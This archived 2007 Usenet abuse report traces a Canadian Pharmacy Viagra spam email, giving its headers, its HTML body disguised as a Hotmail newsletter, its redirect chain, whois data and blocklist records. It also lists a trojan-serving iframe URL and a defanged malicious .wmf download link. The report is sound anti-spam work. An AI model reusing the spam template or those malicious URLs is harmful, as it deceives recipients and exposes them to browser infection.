Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

[email] [drugs - Canadian Pharmacy - trojans] [83.167.101.205] (bojomedia.com / onlinemedcamp.com / 81.95.149.235 / todayisp.com) October 73% OFF

0 views
Skip to first unread message

TomezNet

unread,
Oct 5, 2007, 7:30:34 PM10/5/07
to
Received From:
IP 83.167.101.205
(at comcor-tv.ru / comcor.ru)

Spamvert URL:
http://www.bojomedia.com/7714.html

Redirected to:
http://onlinemedcamp.com/

www.bojomedia.com IP 69.89.31.109
(at bluehost.com / integratelecom.com)

iframe load (infecting browsers with trojans!)
http://81.95.149.235:8081/cgi-bin/n15/in.cgi?p=2

IP 81.95.149.235
(ROK7465 - SBL43489) (at RIPE / rbnnetwork.com / Russian Business
Network)

onlinemedcamp.com IP 89.248.99.107
(SBL59228 - ROK4932) (at interdominios.com)

Title: Canadian Pharmacy

WEB:
© Copyright Canadian Pharmacy, 2003-2007. All Rights Reserved.

Much More Canadian Pharmacy sightings:
http://groups.google.com/groups/search?q=%22Canadian+Pharmacy%22+group%3A*abuse&start=0&scoring=d&

See sender identity and headers forgery by spammer.

Plenty of Forged Certificates and logos as always.

Much More info below:
====================

X-SID-PRA: VIAGRA ® Official Site <[MUNGED]>
X-Message-Info: 6sSXyD95QpWE/
Gol6Xgyk4GJeJi241AC501DMBAdPfMAU5qC2g958D5aGeYeQQXnJaMkcFlQLIHTo5pjtevTYA==
Received: from tomts21-srv.bellnexxia.net ([209.226.175.183]) by bay0-
pamc1-f1.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.2444);
Wed, 3 Oct 2007 14:21:15 -0700
Received: from [MUNGED]
by toip19.srvr.bell.ca with ESMTP; 03 Oct 2007 17:21:06 -0400
Received: (qmail 18206 invoked by uid 110); 3 Oct 2007 17:09:38 -0400
Delivered-To: [MUNGED]
Received: (qmail 18185 invoked from network); 3 Oct 2007 17:09:38
-0400
Received: from unknown (HELO zrb) (83.167.101.205)
by [MUNGED] with SMTP; 3 Oct 2007 17:09:38 -0400
Received: from Rocco Staton (10.13.11.19) by zrb (PowerMTA(TM) v3.2r4)
id hfp12o31d91j24 for <[MUNGED]>; Thu, 4 Oct 2007 01:09:19 +0300
Message-Id: <20071004040919.47015.qmail@zrb>
To: <[MUNGED]>
Subject: October 73% OFF
From: VIAGRA ® Official Site <[MUNGED]>
Return-Path: [MUNGED]
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Date: Wed, 3 Oct 2007 17:21:15 -0400
X-OriginalArrivalTime: 03 Oct 2007 21:21:15.0990 (UTC)
FILETIME=[54F26760:01C80603]

<style>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://
www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr">
<head>
<meta http-equiv=Content-Type content="text/html;
charset=unicode">
<meta name=Generator content="Microsoft SafeHTML">
<title>WL 90-day Email 1a</title>
<table width=550 border=0 cellpadding=0 cellspacing=0
bgcolor="#999999">
<tr>
<td align=center valign=middle>
<table width=548 border=0 cellpadding=0 cellspacing=0
bgcolor="#FFFFFF">
<tr valign=top bgcolor="#999999">
<td><img src="http://ads1.ezo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=14 height=1 border=0></td>
<td><img src="http://ads1.mfs.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=122 height=1 border=0></td>
<td><img src="http://ads1.mdo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=279 height=1 border=0></td>
<td><img src="http://ads1.ext.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=119 height=1 border=0></td>
<td><img src="http://ads1.sxo.com/ads/pronws/CIQ3536/spacer.gif" alt="

" width=14 height=1 border=0></td>
</tr>
<tr valign=top>
<td colspan=5><img src="http://ads1.ufy.com/ads/pronws/
CIQ3536/1a_banner.jpg" alt="Windows

Live Hotmail" width=548 height=224 border=0></td>
</tr>
<tr valign=top>
<td> </td>
<td> </td>
<td colspan=2> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td><img src="http://ads1.pss.com/ads/pronws/CIQ3536/1a_hotmail.jpg"
alt="Hotmail Inbox" width=122 height=130 border=0></td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">Changes you'll
appreciate as a loyal Hotmail user</font>
<font face="Verdana, Arial, Helvetica, sans-serif" style="font-size:
11px">
<br>
Let's hear it for a clean, customizable design! The results? Less
clutter on the page and the ability to choose your own color theme.
Whether you prefer blue, black, red, or green - now you can make
it suit your mood. Plus, check out the improved navigation for
quicker
access to your folders and mail and use search mail to easily find
that
message you sent last month!
<br>
<a href="http://cimail15.kae.com/Key=5289.DgYJ.C.C.Hlqzpy"
style="color:#0099ff" target="_blank"> Find out what else has
changed</a></font></td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">Manage your
spam</font> <font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:11px"> <br>
Thanks to color codes (yellow and red) on incoming messages, you'll be
alerted to suspicious e-mail. Now you decide what to mark as "safe"
and
"unsafe" for improved spam protection on your incoming mail. When you
do so, "unsafe" mail is automatically reported to help improve the
spam
protection on the Hotmail servers. Good news: this can help you
receive
less spam over time!<br>
<br>
<a href="http://cimail15.pln.com/Key=5289.DgYJ.D.C.HzpRwb"
style="color:#0099ff" target="_blank">Manage your spam-here's
how</a></font></td>
<td><img src="http://ads1.vvm.com/ads/pronws/CIQ3536/1a_spam.jpg"
alt=Spam width=119 height=83 border=0></td>
<td> </td>
</tr>
</style>
<p><font color="#FF0000"><a href="http://www.bojomedia.com/
7714.html"><b><font size="+4">Click to buy Official VIAG®A for as low
as $1.79 <b></a></font></p>
<style>
<tr valign=top>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td><img src="http://ads1.nxn.com/ads/pronws/CIQ3536/1a_inbox.jpg"
alt=Inbox width=122 height=104 border=0></td>
<td colspan=2><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:14px;font-weight:bold;color:#0099ff">It's your
inbox, so choose <em>your</em> view</font> <font face="Verdana,
Arial,

Helvetica, sans-serif" style="font-size:11px"> <br>
You choose the way you want to see and use your e-mail:
<br>
<br>
Choose classic version if you want a fast, simple way to read and
manage your e-mail. It's perfect if you have a slower connection or
prefer the traditional inbox view of just your e-mail listed.
<br>
<br>
Use full version if you're on a broadband connection to get access to
more features like address auto-complete, reading pane, and
drag-and-drop. If you're a Microsoft® Office Outlook® user,
you'll feel right at home.<br>
<br>
<a href="http://cimail15.usl.com/Key=5289.DgYJ.F.C.HqpJkn"
style="color:#0099ff" target="_blank">Learn more about classic and
full
version</a></font></td>
<td> </td>
</tr>
<tr valign=top>
<td> </td>
<td colspan=3>
<hr style="height:1px">
</td>
<td> </td>
</tr>

<tr valign=top>
<td> </td>
<td colspan=3><font face="Verdana, Arial, Helvetica, sans-serif"
style="font-size:11px">Microsoft respects your privacy. To learn more,
please read our online <a href="http://cimail15.tpt.com/
Key=5289.DgYJ.G.C.Htf6gp" style="color:#0099ff"
target="_blank">Privacy Statement</a>. <br>
<br>
Microsoft Corporation, One Microsoft Way, Redmond, WA 98052</font></
td>
<td> </td>
</tr>
<tr valign=top>
<td colspan=5> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td align=center valign=middle><img src="http://ads1.hrx.com/ads/
pronws/CIQ3536/spacer.gif" alt=" " width=122 height=1 border=0></td>
</tr>
</table>
</div>
</div>
</div>
</body>
</html>
</style>

-- END OF SPAM --

Recent spammer sightings:
http://groups.google.com/groups/search?q=%22September+70%25%22+group%3A*abuse&start=0&scoring=d&

SEE sender identity and headers forgery by spammer spoofing our
domain.

WEB:
Licensed by The College of Pharmacists of British Columbia.
If you have any questions or concerns you can contact the college at
200-1765 West 8th Ave. Vancouver, BC, Canada V6J 5C6
You may contact us at +1(210) 787-1711, please, keep your order I.D.
every time you make a call.
© Copyright Canadian Pharmacy, 2003-2007. All Rights Reserved.

See also Viagra.com Inc sightings:
http://groups.google.com/groups/search?q=%22Viagra.com+Inc%22+group%3A*abuse&start=0&scoring=d&

See:
IP 83.167.101.205

http://moensted.dk/spam/?addr=83.167.101.205
http://spamcop.net/w3m?action=checkblock&ip=83.167.101.205
Spam source - http://wpbl.info/record?ip=83.167.101.205

More comcor-tv.ru sightings:
http://groups.google.com/groups/search?q=comcor-tv.ru+group%3A*abuse&start=0&scoring=d&

inetnum: 83.167.101.0 - 83.167.101.255
netname: COMCOR-TV_CLIENTS_C14_2
descr: public for subscibers COMCOR-TV CMTS01
country: RU
role: NOC CCTV
address: Russia, 117036, Moscow
address: Dm. Ulianova st., 7A
phone: +7 (495) 132 79 03
fax-no: +7 (495) 737 51 94

route: 83.167.96.0/19
descr: COMCOR-TV Network
origin: AS15582
notify: regi...@comcor-tv.ru
notify: tat...@comcor-tv.ru
mnt-by: COMTV-MNT
changed: gle...@rambler-co.ru
AS Name: COMCORTV-AS COMCOR-TV Autonomous System
http://www.cidr-report.org/cgi-bin/as-report?as=15582

6 SBL listings for IPs under the responsibility of comcor.ru
http://www.spamhaus.org/sbl/listings.lasso?isp=comcor.ru

Spamvert URL:
http://www.bojomedia.com/7714.html

See source code:

HTTP/1.1 200 OK
Date: Thu, 04 Oct 2007 17:11:07 GMT
Server: Apache/1.3.37 (Unix) mod_fastcgi/2.4.2 mod_auth_passthrough/
1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2
mod_ssl/2.8.28 OpenSSL/0.9.7a PHP-CGI/0.1b
Last-Modified: Mon, 03 Oct 2007 12:57:34 GMT
ETag: "1150c36-45-4700eebe"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/html

<META http-equiv="refresh" content="0; url=http://onlinemedcamp.com">

Redirected to:
http://onlinemedcamp.com/

See:
www.bojomedia.com IP 69.89.31.109
ns1.bluehost.com 74.220.195.31
ns2.bluehost.com 69.89.16.4
MX bojomedia.com 69.89.31.109

http://moensted.dk/spam/?addr=69.89.31.109

69.89.31.109 = box309.bluehost.com

OrgName: Bluehost Inc.
OrgID: BLUEH-2
NetRange: 69.89.16.0 - 69.89.31.255
CIDR: 69.89.16.0/20
NetName: BLUEHOST-NETWORK-1
NetHandle: NET-69-89-16-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.BLUEHOST.COM
NameServer: NS2.BLUEHOST.COM

route: 69.89.16.0/20
descr: Integra Telecom Route Object
origin: AS11798
remarks: Integra Telecom Customer
remarks: contacts per RFC2142:
remarks: Abuse / UCE report abuse[]integratelecom.com
AS Name: BLUEHOST-AS - Bluehost Inc.
http://www.cidr-report.org/cgi-bin/as-report?as=11798

10 SBL listings for IPs under the responsibility of integratelecom.com
http://www.spamhaus.org/sbl/listings.lasso?isp=integratelecom.com

1 SBL listings for IPs under the responsibility of bluehost.com
http://www.spamhaus.org/sbl/listings.lasso?isp=bluehost.com

Let see whois.fastdomain.com:
Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/

Domain Name: BOJOMEDIA.COM

Created on..............: 2007-08-10 16:10:11 GMT
Expires on..............: 2008-08-10 10:10:11 GMT
Last modified on........: 2007-09-11 16:08:06 GMT

Registrant Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Administrative Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Technical Info: (FAST-12785240)
Attn: bojomedia.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way
Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: wh...@bluehost.com
Last modified: 2007-04-05 16:50:56 GMT

Status: Locked

Domain servers in listed order:
NS1.BLUEHOST.COM
NS2.BLUEHOST.COM

WRNING => infecting browsers with trojans!
SEE iframe load from:
http://81.95.149.235:8081/cgi-bin/n15/in.cgi?p=2

See:
IP 81.95.149.235

http://moensted.dk/spam/?addr=81.95.149.235
http://www.spamhaus.org/query/bl?ip=81.95.149.235

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL43489
81.95.144.0/20 is listed on the Spamhaus Block List (SBL)

16-Jul-2007 05:25 GMT | SR04

Russian Business Network.
rbnnetwork.com / Too coin Software: iframemoney.biz / etc.
Shame shame, infecting browsers with trojans!
h t t p : / / xgbgsfmdis.biz/ dl/ xpladv737.wmf

Main Info:
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK7465

53 SBL/ROKSO listings for IPs under the responsibility of RIPE
http://www.spamhaus.org/sbl/listings.lasso?isp=RIPE

See:
onlinemedcamp.com IP 89.248.99.107
ns3.todayisp.com 218.16.121.50
ns4.todayisp.com 210.22.13.48

onlinemedcamp.com has no MX records

http://moensted.dk/spam/?addr=89.248.99.107

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL59228
89.248.99.107/32 is listed on the Spamhaus Block List (SBL/ROKSO)

02-Oct-2007 04:45 GMT | SR20

Leo Kuvayev / BadCow.
Canadian Pharmacy site (onlinemedcamp.com)

Main Info:
http://www.spamhaus.org/rokso/evidence.lasso?rokso_id=ROK4932

2 SBL/ROKSO listings for IPs under the responsibility of
interdominios.com
http://www.spamhaus.org/sbl/listings.lasso?isp=interdominios.com

inetnum: 89.248.96.0 - 89.248.111.255
netname: ES-INTERDOMINIOS-COM-20060704
descr: Grupo Interdominios S.A
country: ES
organisation: ORG-GIS8-RIPE
org-name: Grupo Interdominios S.A
org-type: LIR
person: Fernando Gonzalez Barsh
address: Avd del Tormes n2 local 90
Urb Las Lomas
Boadilla del Monte
Madrid 28660
Spain
e-mail: ben...@interdominios.com

route: 89.248.99.0/24
descr: Internet Access Routes of Interdominios
descr: Grupo Interdominios S.A
origin: AS42237
mnt-by: FernandoGonz-mnt
changed: fern...@interdominios.com
AS Name: INTERDOMINIOS Grupo Interdominios S.A.
http://www.cidr-report.org/cgi-bin/as-report?as=42237

Let see whois.todaynic.com:
Domain name: onlinemedcamp.com
Status: Active

Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php
)

Registrant:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000

Administrative Contact:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000
Phone: +86.7913219002
Fax: +86.7913219002
Email: cnc...@21cn.com

Technical Contact:
Name: liu tao
Organization: liu tao
Address: nan chang
City: NanChang
Country: CN
Postal Code: 321000

Nameserver Information:

Create: 2007-09-27 07:17:49
Update: 2007-09-27
Expired: 2008-09-27

See:
ns4.todayisp.com IP 210.22.13.48

reverse:
210.22.13.48 = sym.gdsz.cncnet.net

http://moensted.dk/spam/?addr=210.22.13.48
http://www.spamhaus.org/query/bl?ip=210.22.13.48

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL59229
210.22.8.0/21 is listed on the Spamhaus Block List (SBL)

02-Oct-2007 04:53 GMT | SR04

Nothing but spam from this china-netcom.com network

13 SBL listings for IPs under the responsibility of china-netcom.com
http://www.spamhaus.org/sbl/listings.lasso?isp=china-netcom.com

inetnum: 210.22.0.0 - 210.22.35.255
netname: SHENZHEN2-CNC
country: CN
descr: shenzhen branch, china netcom corp
admin-c: YS224-AP
tech-c: YS224-AP
status: ALLOCATED NON-PORTABLE
changed: cnci...@china-netcom.com
person: yumei sun
nic-hdl: YS224-AP
e-mail: sz-ipa...@china-netcom.com
address: china netcom
address: shenzhen
phone: +86-0755-6983588
country: CN
changed: mo...@china-netcom.com

route: 210.22.0.0/19
descr: CHINA NETCOM
origin: AS9929
mnt-by: MAINT-AS9929
changed: xu...@china-netcom.com
AS Name: CNCGROUP-SZ CNCGROUP IP network of ShenZhen region MAN
network
http://www.cidr-report.org/cgi-bin/as-report?as=17623

See:
ns3.todayisp.com IP 218.16.121.50

More 218.16.121.50 sightings:
http://groups.google.com/groups/search?q=218.16.121.50+group%3A*abuse&qt_s=Search

http://moensted.dk/spam/?addr=218.16.121.50
Blocked http://www.spamsources.fabel.dk/ip/218.16.121.50

inetnum: 218.13.0.0 - 218.18.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN

AS Name: CHINANET-BACKBONE No.31,Jin-rong Street
http://www.cidr-report.org/cgi-bin/as-report?as=4134

Let see whois.networksolutions.com:
Registrant:
Ma, Songxin
Todaynic.com,INC.
No.211 Xihai building Renming E road
Xiangzhou district
Zhuhai, GD 519000
CN

Domain Name: TODAYISP.COM

Administrative Contact, Technical Contact:
Ma, Songxin sa...@now.net.cn
Todaynic.com,INC.
No.211 Xihai building Renming E road
Xiangzhou district
Zhuhai, GD 519000
CN
+86-756-2282685 fax: +86-756-2282526

Record expires on 09-Jun-2010.
Record created on 09-Jun-2002.
Database last updated on 5-Oct-2007 18:05:32 EDT.

Domain servers in listed order:
NS4.TODAYISP.COM 210.22.13.48
NS3.TODAYISP.COM 218.16.121.50

More todayisp.com sightings:
http://groups.google.com/groups/search?q=todayisp.com+group%3A*abuse&start=0&scoring=d&

Read more:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/ae0a8cc1a8b9e918

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/6cd26c793e4a5c23

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/304b0dc256d9e615

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/17cd1878f9bd53ba

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/1db3147bc2411d77

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/7f587d35d2b7fe49

And:
http://groups.google.com/group/news.admin.net-abuse.sightings/msg/64063dbbcc112c50

Cheers, Tomez


--
All postings to news.admin.net-abuse.sightings are unconfirmed and
unverified unless stated otherwise by the moderators. All opinions
expressed above are considered the opinions of the original poster,
not the moderators or their respective employers.

For a copy of the guidelines to this group, see:

http://www.killfile.org/~tskirvin/nana/

0 new messages